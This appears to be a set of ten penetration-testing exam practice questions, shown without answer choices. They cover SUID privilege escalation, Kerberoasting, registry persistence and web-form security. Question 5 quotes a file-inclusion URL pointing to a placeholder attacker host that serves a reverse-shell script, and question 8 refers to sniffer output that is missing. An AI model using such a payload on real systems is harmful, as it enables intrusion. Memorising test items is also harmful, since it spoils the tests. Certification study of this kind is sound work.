1.
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled ''changepass." -sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass Using "strings" to print ASCII printable characters from changepass, the tester notes the following:
$ strings changepass
exit
setuid
strcmp
GLIBC_2.0
ENV_PATH
%s/changepw
malloc
strlen
Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?
2.
A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?
3.
An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:
4.
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?
5.
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Which of the following remediation steps should be taken to prevent this type of attack?
6.
A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?
7.
A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select THREE).
8.
A penetration tester is reviewing the following output from a wireless sniffer: Which of the following can be extrapolated from the above information?
9.
In which of the following scenarios would a tester perform a Kerberoasting attack?
10.
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?